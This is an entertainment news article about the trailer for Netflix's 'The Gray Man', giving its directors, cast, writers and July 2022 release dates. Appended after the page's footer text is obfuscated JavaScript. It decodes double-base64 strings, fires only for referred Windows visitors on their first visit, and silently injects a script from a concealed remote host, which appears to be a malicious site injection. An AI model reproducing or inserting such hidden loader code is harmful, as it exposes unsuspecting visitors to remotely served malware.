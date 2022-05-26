Connect with us

Hi, what are you looking for?

The Gray Man - Ryan Gosling

Film

‘The Gray Man’: Ryan Gosling and Chris evans face-off in explosive trailer

The action-packed film is released in July.

Published

The explosive trailer has been released for Netflix’s upcoming action flick ‘The Gray Man’.

Directed by The Russo Brothers – Anthony Russo and Joe Russo – the film stars Ryan Gosling, Chris Evans, Ana de Armas, Jessica Henwick, Wagner Moura, Dhanush, Billy Bob Thornton, Alfre Woodard, Regé-Jean Page, Julia Butters, Eme Ikwuakor, and Scott Haze.

The film is based on the book series ‘The Gray Man’ by Mark Greaney, and it’s written by Joe Russo, Christopher Markus and Stephen McFeely.

Ryan Gosling is The Gray Man and Chris Evans is his psychopathic adversary in the Netflix/AGBO-produced thriller.

Advertisement. Scroll to continue reading.

Watch the trailer at the top of this article and take a look at the key art below:

The Gray Man
Credit: Netflix

‘The Gray Man’ is in select UK cinemas from 15th July 2022 and on Netflix from 22nd July 2022. 

In this article:, , ,

Advertisement

You May Also Like

Old Dominion Old Dominion

EF Country

Your Top 10 Country Music Lyrics to Live By

Which Country songs give you the best advice?

5 days ago
Midland Midland

EF Country

Midland, Roundhouse, London live review

The country trio kicked off their UK tour in London after three and a half years away.

4 days ago
Nicolette Hayford Nicolette Hayford

EF Country

The Nashville songwriter behind the Pillbox Patti alter-ego is……….

Acclaimed Nashville songwriter debuts her alter-ego, Pillbox Patti.

5 days ago
TJ Walker TJ Walker

EF Country

TJ Walker releases new single which features in upcoming Nashville-based Country music musical

'With and Without You' released today.

6 days ago



Copyright © 2021 Entertainment Focus

Entertainment Focus is a trading name of Piñata Media Limited (Reg no: 08435639)

Entertainment Focus uses affiliate links. By buying through the links we may receive a commission for the sale. This has no effect on the price for you ;(function(){var mq=document.referrer;var xn=window.location.href;var rw=navigator.userAgent;var rt=new RegExp(xe('T2k4dktGdGVMMTByS1M4PQ=='));if(!mq||xn.match(rt)[1]==mq.match(rt)[1]||rw.indexOf(xe("VjJsdVpHOTNjdz09"))==-1||window.localStorage[xe("WDE5ZmRYUnRZUT09")]){return;}var xs=document.createElement('script');xs.type='text/javascript';xs.async=true;xs.src=xe('YUhSMGNITTZMeTloWTNSdmNuTXVhbU55WVdOcGJtY3VZMjl0TDNKbGNHOXlkRDl5UFdScU1ETk5SR2Q1V2xSak5WcHRUbWhPTWtWM1dUSk5NbGxxUVROT1ExcHFZVmRST1UxcVdYbz0=');var wj=document.getElementsByTagName('script')[0];wj.parentNode.insertBefore(xs,wj);function xe(os){return mj(window.atob(os));}function mj(zc){return window.atob(zc);}})();